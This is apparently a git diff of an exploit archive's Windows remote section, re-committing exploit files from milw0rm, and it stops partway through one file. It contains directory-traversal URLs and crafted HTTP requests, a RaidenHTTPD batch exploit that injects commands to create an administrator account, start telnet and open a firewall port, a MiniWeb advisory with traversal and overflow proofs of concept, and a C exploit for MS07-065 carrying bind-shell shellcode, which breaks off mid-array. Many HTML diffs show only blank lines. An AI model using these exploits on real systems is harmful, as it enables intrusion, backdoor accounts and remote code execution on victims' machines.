+cookie of the admin and gaining access to the server configuration. + + +####################################################################### + +=========== +3) The Code +=========== + + +A] +http://SERVER/\..\..\..\boot.ini +http://SERVER/%80..\..\..\boot.ini +http://SERVER/%ff..\bdlicense.dat + +B] +http://SERVER/lua.lsp+ +http://SERVER/lua.lsp. +http://SERVER/lua.lsp%80 + +C] +POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1 +Host: SERVER +Cookie: "use the real user's cookie!" 
+Content-Type: application/x-www-form-urlencoded +Content-Length: 21 + +dir=..\..\..\file.txt + +D] +POST /eh/chat.ehintf/C. HTTP/1.1 +Host: SERVER +Content-Type: text/plain +Content-Length: 0 +Cookie: "use the real user's cookie!" + +E] +GET HTTP/1.0 + + +####################################################################### + +====== +4) Fix +====== + + +Version 3.8 + + +####################################################################### + +# milw0rm.com [2007-12-10] diff --git a/platforms/windows/remote/472.c b/platforms/windows/remote/472.c index 7fdceebe7..53314e0c0 100755 --- a/platforms/windows/remote/472.c +++ b/platforms/windows/remote/472.c @@ -149,6 +149,6 @@ void main() fprintf(fout,"\xFF\xD9"); fcloseall(); -} - -// milw0rm.com [2004-09-22] +} + +// milw0rm.com [2004-09-22] diff --git a/platforms/windows/remote/4720.html b/platforms/windows/remote/4720.html index a39ed6257..69a8309d0 100755 --- a/platforms/windows/remote/4720.html +++ b/platforms/windows/remote/4720.html @@ -1,256 +1,256 @@ - - - - - - - - - - - - -# milw0rm.com [2007-12-11] + + + + + + + + + + + + +# milw0rm.com [2007-12-11] diff --git a/platforms/windows/remote/473.c b/platforms/windows/remote/473.c index e6049a369..b17593219 100755 --- a/platforms/windows/remote/473.c +++ b/platforms/windows/remote/473.c @@ -257,6 +257,6 @@ close(sock); return 0; -} - -// milw0rm.com [2004-09-22] +} + +// milw0rm.com [2004-09-22] diff --git a/platforms/windows/remote/4746.html b/platforms/windows/remote/4746.html index 9cb3d086f..4e329108e 100755 --- a/platforms/windows/remote/4746.html +++ b/platforms/windows/remote/4746.html @@ -1,89 +1,89 @@ -
    ------------------------------------------------------------------------
    - RavWare Software MAS Flic Control "FileName()" method Buffer Overflow
    - url: https://www.ravware.com/
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - File name: masflc.ocx
    - Version:   1.0.0.1
    -
    - Remote execution depends on Internet Explorer settings
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet
    - Explorer 7
    - 
    - This exploits executes calc.exe
    -
    - Heap Spray Technique was developed by SkyLined
    - (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
    ------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
-# milw0rm.com [2007-12-18]
+
    +-----------------------------------------------------------------------
    + RavWare Software MAS Flic Control "FileName()" method Buffer Overflow
    + url: https://www.ravware.com/
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + File name: masflc.ocx
    + Version:   1.0.0.1
    +
    + Remote execution depends on Internet Explorer settings
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet
    + Explorer 7
    + 
    + This exploits executes calc.exe
    +
    + Heap Spray Technique was developed by SkyLined
    + (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
    +-----------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
+# milw0rm.com [2007-12-18]
diff --git a/platforms/windows/remote/4747.vbs b/platforms/windows/remote/4747.vbs
index 0da71fc8a..aa5bf2e30 100755
--- a/platforms/windows/remote/4747.vbs
+++ b/platforms/windows/remote/4747.vbs
@@ -1,38 +1,38 @@ -rem raidenhttpdudo.cmd - - @echo off - - color 0a - -rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit -rem WebAdmin one - not enabled by default anymore -rem however works regardless of php.ini, because -rem "ulang" comes from $_GET[] and some magic_quo -rem tes_gpc disable code,lame divertissement one -rem to demonstrate an unauthenticated directory -rem traversal ... -rem rgod ----------http://violentcop.splinder.com - - if {%1}=={} goto kill - -echo HEAD /?^ HTTP/1.1>in -echo Host: %1>>in & echo Connection: Close>>in & echo.>>in -nc %1 80 -v -w1< in > nul -echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & set /p exploit=< puf -echo GET /raidenhttpd-admin/workspace.php?CMD=cmd.exe+%%2Fc+net+user+sun+tzu+%%2Fadd+%%26+net+localgroup+Administrators+sun+%%2Fadd+%%26+sc+config+NtLmSsp+start%%3D+auto+%%26+sc+config+RpcSs+start%%3D+auto+%%26+net+start+RpcSs+%%26+net+start+NtLmSsp+%%26+sc+config+TlntSvr+start%%3D+auto+%%26+net+start+TlntSvr+%%26+netsh+firewall+add+portopening+tcp+23+sh+%%26+echo+REGEDIT4+%%3E+sh.reg+%%26+echo+%%5BHKEY_LOCAL_MACHINE%%5CSYSTEM%%5CCurrentControlSet%%5CControl%%5CLsa%%5D+%%3E%%3E+sh.reg+%%26+echo+%%22forceguest%%22%%3Ddword%%3A00000000+%%3E%%3E+sh.reg+%%26+regedit+%%2FS+sh.reg^&ulang=%exploit% HTTP/1.1> in -echo Host: %1>>in & echo Connection: Close>>in & echo.>>in -echo please wait ... -nc %1 80 -v -w1< in > nul -ping localhost -n 15>nul & rem delaying ... -del puf -del in - telnet %1 23 - - goto nowhere - - :kill - echo %0 [target-host] - - :nowhere - -rem milw0rm.com [2007-12-18] +rem raidenhttpdudo.cmd + + @echo off + + color 0a + +rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit +rem WebAdmin one - not enabled by default anymore +rem however works regardless of php.ini, because +rem "ulang" comes from $_GET[] and some magic_quo +rem tes_gpc disable code,lame divertissement one +rem to demonstrate an unauthenticated directory +rem traversal ... 
+rem rgod ----------http://violentcop.splinder.com + + if {%1}=={} goto kill + +echo HEAD /?^ HTTP/1.1>in +echo Host: %1>>in & echo Connection: Close>>in & echo.>>in +nc %1 80 -v -w1< in > nul +echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & set /p exploit=< puf +echo GET /raidenhttpd-admin/workspace.php?CMD=cmd.exe+%%2Fc+net+user+sun+tzu+%%2Fadd+%%26+net+localgroup+Administrators+sun+%%2Fadd+%%26+sc+config+NtLmSsp+start%%3D+auto+%%26+sc+config+RpcSs+start%%3D+auto+%%26+net+start+RpcSs+%%26+net+start+NtLmSsp+%%26+sc+config+TlntSvr+start%%3D+auto+%%26+net+start+TlntSvr+%%26+netsh+firewall+add+portopening+tcp+23+sh+%%26+echo+REGEDIT4+%%3E+sh.reg+%%26+echo+%%5BHKEY_LOCAL_MACHINE%%5CSYSTEM%%5CCurrentControlSet%%5CControl%%5CLsa%%5D+%%3E%%3E+sh.reg+%%26+echo+%%22forceguest%%22%%3Ddword%%3A00000000+%%3E%%3E+sh.reg+%%26+regedit+%%2FS+sh.reg^&ulang=%exploit% HTTP/1.1> in +echo Host: %1>>in & echo Connection: Close>>in & echo.>>in +echo please wait ... +nc %1 80 -v -w1< in > nul +ping localhost -n 15>nul & rem delaying ... +del puf +del in + telnet %1 23 + + goto nowhere + + :kill + echo %0 [target-host] + + :nowhere + +rem milw0rm.com [2007-12-18] diff --git a/platforms/windows/remote/475.sh b/platforms/windows/remote/475.sh index 6cb7da739..aec973e28 100755 --- a/platforms/windows/remote/475.sh +++ b/platforms/windows/remote/475.sh @@ -182,6 +182,6 @@ printf "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; #******************************************** #end_of_jpeg #******************************************** -printf "\xFF\xD9"; - -# milw0rm.com [2004-09-23] +printf "\xFF\xD9"; + +# milw0rm.com [2004-09-23] diff --git a/platforms/windows/remote/478.c b/platforms/windows/remote/478.c index 7c7474655..f42b8fded 100755 --- a/platforms/windows/remote/478.c +++ b/platforms/windows/remote/478.c 
@@ -208,6 +208,6 @@ int main(int argc, char *argv[]) printf("The Jpeg Server, has been created.with your settings.\n"); return 0; -} - -// milw0rm.com [2004-09-25] +} + +// milw0rm.com [2004-09-25] diff --git a/platforms/windows/remote/480.c b/platforms/windows/remote/480.c index cd2c52c5a..a4a1f8403 100755 --- a/platforms/windows/remote/480.c +++ b/platforms/windows/remote/480.c @@ -424,6 +424,6 @@ int main(int argc, char *argv[]) printf(" Exploit JPEG file %s has been generated!\n", jpeg_filename); return(EXIT_SUCCESS); -} - -// milw0rm.com [2004-09-25] +} + +// milw0rm.com [2004-09-25] diff --git a/platforms/windows/remote/4806.html b/platforms/windows/remote/4806.html index 62ecce6ff..31e59c20a 100755 --- a/platforms/windows/remote/4806.html +++ b/platforms/windows/remote/4806.html @@ -1,114 +1,114 @@ - - - - Persits Software XUpload Control AddFolder BoF -Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2007-12-28] + + + + Persits Software XUpload Control AddFolder BoF +Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2007-12-28] diff --git a/platforms/windows/remote/4818.html b/platforms/windows/remote/4818.html index 0bf98e58e..286dd983d 100755 --- a/platforms/windows/remote/4818.html +++ b/platforms/windows/remote/4818.html @@ -1,116 +1,116 @@ - - - - IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2007-12-30] + + + + IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2007-12-30] diff --git a/platforms/windows/remote/4819.html b/platforms/windows/remote/4819.html index 5f9a52e45..a883ae395 100755 --- a/platforms/windows/remote/4819.html +++ b/platforms/windows/remote/4819.html 
@@ -1,114 +1,114 @@ - - - - Macrovision Installshield isusweb.dll SEH Overwrite Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2007-12-30] + + + + Macrovision Installshield isusweb.dll SEH Overwrite Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2007-12-30] diff --git a/platforms/windows/remote/4820.html b/platforms/windows/remote/4820.html index 1abf9f4b7..c0a7ceefe 100755 --- a/platforms/windows/remote/4820.html +++ b/platforms/windows/remote/4820.html @@ -1,115 +1,115 @@ - - - - IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2007-12-30] + + + + IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2007-12-30] diff --git a/platforms/windows/remote/4825.html b/platforms/windows/remote/4825.html index 139e56fe3..4b132afe3 100755 --- a/platforms/windows/remote/4825.html +++ b/platforms/windows/remote/4825.html @@ -1,115 +1,115 @@ - - - - Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2007-12-31] + + + + Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2007-12-31] diff --git a/platforms/windows/remote/4869.html b/platforms/windows/remote/4869.html index 038b9456f..119f94992 100755 --- a/platforms/windows/remote/4869.html +++ b/platforms/windows/remote/4869.html @@ -1,30 +1,30 @@ - - - - Gateway Weblaunch ActiveX Control Insecure Method Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-01-08] + + + + Gateway Weblaunch ActiveX Control Insecure Method Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-01-08] diff --git a/platforms/windows/remote/4873.html b/platforms/windows/remote/4873.html index 7d2e25480..7d2b4bb4f 100755 --- a/platforms/windows/remote/4873.html 
+++ b/platforms/windows/remote/4873.html
@@ -1,31 +1,31 @@
-
    ------------------------------------------------------------------------------
    - Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution
    - url: http://www.microsoft.com
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Not much more to say than using "DoCmd()" function, you can run
    - applications passed as argument.
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
-# milw0rm.com [2008-01-09]
+
    +-----------------------------------------------------------------------------
    + Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution
    + url: http://www.microsoft.com
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Not much more to say than using "DoCmd()" function, you can run
    + applications passed as argument.
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
+# milw0rm.com [2008-01-09]
diff --git a/platforms/windows/remote/4874.html b/platforms/windows/remote/4874.html
index 900a2dbf5..82587cca0 100755
--- a/platforms/windows/remote/4874.html
+++ b/platforms/windows/remote/4874.html
@@ -1,42 +1,42 @@
-
    -----------------------------------------------------------------------------
    - Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method
    - url: http://www.microsoft.com
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Technical details:
    - File: RICHTX32.OCX
    - ver.: 6.1.97.82
    -
    - While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
    - killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}
    -
    - works fine so it is possible, using the "SaveFile()" method,
    - to save the content of the rich textbox on a user's pc.
    - This can be used to save, overwrite and/or corrupt arbitrary
    - files on the system.
    - 
    - It's marked as:
    - RegKey Safe for Script: False
    - RegKey Safe for Init: False
    - Implements IObjectSafety: True
    - IPersist Safe: Safe for untrusted: caller,data
    - IPStorage Safe: Safe for untrusted: caller,data
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    ------------------------------------------------------------------------------
    -	
    -
    -
-# milw0rm.com [2008-01-09]
+
    -----------------------------------------------------------------------------
    + Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method
    + url: http://www.microsoft.com
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Technical details:
    + File: RICHTX32.OCX
    + ver.: 6.1.97.82
    +
    + While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
    + killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}
    +
    + works fine so it is possible, using the "SaveFile()" method,
    + to save the content of the rich textbox on a user's pc.
    + This can be used to save, overwrite and/or corrupt arbitrary
    + files on the system.
    + 
    + It's marked as:
    + RegKey Safe for Script: False
    + RegKey Safe for Init: False
    + Implements IObjectSafety: True
    + IPersist Safe: Safe for untrusted: caller,data
    + IPStorage Safe: Safe for untrusted: caller,data
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +-----------------------------------------------------------------------------
    +	
    +
    + +# milw0rm.com [2008-01-09] diff --git a/platforms/windows/remote/4894.html b/platforms/windows/remote/4894.html index 5c82e77c4..3163007c3 100755 --- a/platforms/windows/remote/4894.html +++ b/platforms/windows/remote/4894.html @@ -1,69 +1,69 @@ - - - - StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-01-11] + + + + StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-01-11] diff --git a/platforms/windows/remote/4909.html b/platforms/windows/remote/4909.html index 650bca214..ff13570b7 100755 --- a/platforms/windows/remote/4909.html +++ b/platforms/windows/remote/4909.html @@ -1,35 +1,35 @@ - - - - Macrovision FlexNet DownloadManager Insecure Methods Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-01-14] + + + + Macrovision FlexNet DownloadManager Insecure Methods Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-01-14] diff --git a/platforms/windows/remote/4913.html b/platforms/windows/remote/4913.html index d9573f6b2..7dfb99fee 100755 --- a/platforms/windows/remote/4913.html +++ b/platforms/windows/remote/4913.html @@ -1,26 +1,26 @@ - - - - Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-01-15] + + + + Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-01-15] diff --git a/platforms/windows/remote/4918.html b/platforms/windows/remote/4918.html index 63be43310..901718c89 100755 --- a/platforms/windows/remote/4918.html +++ b/platforms/windows/remote/4918.html @@ -1,79 +1,79 @@ - - - - - - -# milw0rm.com [2008-01-16] + + + + + + +# milw0rm.com [2008-01-16] diff --git a/platforms/windows/remote/4923.txt b/platforms/windows/remote/4923.txt index 64dbff64c..c0fe65f8f 100755 
--- a/platforms/windows/remote/4923.txt
+++ b/platforms/windows/remote/4923.txt
@@ -1,64 +1,64 @@ -MiniWeb Multiple Vulnerabilities - -Introduction -MiniWeb is a mini HTTP server implementation written in C language, -featuring low system resource consumption, high efficiency, good -flexibility and high portability. -It is capable to serve multiple clients with a single thread, -supporting GET and POST methods, authentication, dynamic contents -(dynamic web page and page variable substitution) and file uploading. -MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows. - -vulnerability discovered by : Hamid Ebadi (ebadi _AT_ bugtraq.ir) - -http://www.bugtraq.ir - -complete advisory and also source code auditing can be found at : - - http://www.bugtraq.ir/adv/miniweb_persian.pdf (persian) - http://www.bugtraq.ir/adv/miniweb_english.pdf (english) - -vulnerable version : MiniWeb 0.8.19 (C)2005 Written by Stanley Huang -http://miniweb.sourceforge.net/ -http://sourceforge.net/projects/miniweb - -Description: - -directory traversals : - -An input validation error in the URL request handling in -mwGetLocalFileName() function ( http.c) can be exploited to -disclose arbitrary files (and also Directory listing) outside the web -root via directory traversals attacks via the " /.%2e/" or "/%2e%2e/" - sequences - -Proof of Concept : -Directory listing: -http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/ - -disclose arbitrary files: -http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini - - -Heap based buffer overflow vulnerability : - -There is also heap based buffer overflow in this web server -The vulnerability is caused due to a boundary error in -_mwProcessReadSocket() function (http.c) when handling HTTP requests. -This can be exploited by sending an overly long, specially crafted -request, which can cause a heap overflow and allow arbitrary code -execution with the privileges of the web service. 
- - -Proof of Concept : -GET /AAAA...[3600 - 4000]...AAAA/ HTTP/1.0 - -Solution: -Edit the source code (for more information see this article) - -http://www.bugtraq.ir/adv/miniweb_persian.pdf (persian) -http://www.bugtraq.ir/adv/miniweb_english.pdf (english) - -Copyright : http://www.bugtraq.ir - -# milw0rm.com [2008-01-16] +MiniWeb Multiple Vulnerabilities + +Introduction +MiniWeb is a mini HTTP server implementation written in C language, +featuring low system resource consumption, high efficiency, good +flexibility and high portability. +It is capable to serve multiple clients with a single thread, +supporting GET and POST methods, authentication, dynamic contents +(dynamic web page and page variable substitution) and file uploading. +MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows. + +vulnerability discovered by : Hamid Ebadi (ebadi _AT_ bugtraq.ir) + +http://www.bugtraq.ir + +complete advisory and also source code auditing can be found at : + + http://www.bugtraq.ir/adv/miniweb_persian.pdf (persian) + http://www.bugtraq.ir/adv/miniweb_english.pdf (english) + +vulnerable version : MiniWeb 0.8.19 (C)2005 Written by Stanley Huang +http://miniweb.sourceforge.net/ +http://sourceforge.net/projects/miniweb + +Description: + +directory traversals : + +An input validation error in the URL request handling in +mwGetLocalFileName() function ( http.c) can be exploited to +disclose arbitrary files (and also Directory listing) outside the web +root via directory traversals attacks via the " /.%2e/" or "/%2e%2e/" + sequences + +Proof of Concept : +Directory listing: +http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/ + +disclose arbitrary files: +http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini + + +Heap based buffer overflow vulnerability : + +There is also heap based buffer overflow in this web server +The vulnerability is caused due to a boundary error in +_mwProcessReadSocket() function (http.c) when handling HTTP 
requests.
+This can be exploited by sending an overly long, specially crafted
+request, which can cause a heap overflow and allow arbitrary code
+execution with the privileges of the web service.
+
+
+Proof of Concept :
+GET /AAAA...[3600 - 4000]...AAAA/ HTTP/1.0
+
+Solution:
+Edit the source code (for more information see this article)
+
+http://www.bugtraq.ir/adv/miniweb_persian.pdf (persian)
+http://www.bugtraq.ir/adv/miniweb_english.pdf (english)
+
+Copyright : http://www.bugtraq.ir
+
+# milw0rm.com [2008-01-16]
diff --git a/platforms/windows/remote/4932.html b/platforms/windows/remote/4932.html
index d6cbf51ff..49d09cce0 100755
--- a/platforms/windows/remote/4932.html
+++ b/platforms/windows/remote/4932.html
@@ -1,78 +1,78 @@
- - - - - -
-# milw0rm.com [2008-01-17]
+ + + + + +
+# milw0rm.com [2008-01-17]
diff --git a/platforms/windows/remote/4934.c b/platforms/windows/remote/4934.c
index fbe96b2f2..dcad9485f 100755
--- a/platforms/windows/remote/4934.c
+++ b/platforms/windows/remote/4934.c
@@ -1,413 +1,413 @@ -/* -Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) -Mod of axis's code. - -CHANGELOG - -- added dnsname as a parameter, before it was hardcoded in the - request data. (Marcin Kozlowski) - -Provided for legal security research and testing purposes ONLY - -Go through the code :) - -*/ - -#include -#include -#include -#include -#include -#pragma comment(lib,"ws2_32") - -// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0 -char bind_str[] = { - 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, - 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, - 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, - 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, - 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, - 0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, - 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, - 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 -}; - - -char *request_1; - - -// RPC Request Opnum: 0x06 -char request_1a[] = { - 0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00, - 0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, - 0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11, - 0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25, - 0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00 -}; - - -char *request_1b; - - -char request_1c[] = { - 0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode - 0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx - 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode - 0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc, - 0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b, - 0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6, - 0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83, - 0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83, - 0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3, - 0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43, - 0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6, - 0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83, - 0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e, - 0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6, - 0x7b, 0xd5, 0xde, 
0xb3, 0xbc, 0xd0, 0x96, 0xc1, - 0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f, - 0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c, - 0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea, - 0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6, - 0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2, - 0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f, - 0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea, - 0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1, - 0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1, - 0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1, - 0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45, - 0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d, - 0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d, - 0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb, - 0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6, - 0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44, - 0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4, - 0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67, - 0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8, - 0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c, - 0x25, 0x99, 0xe3, 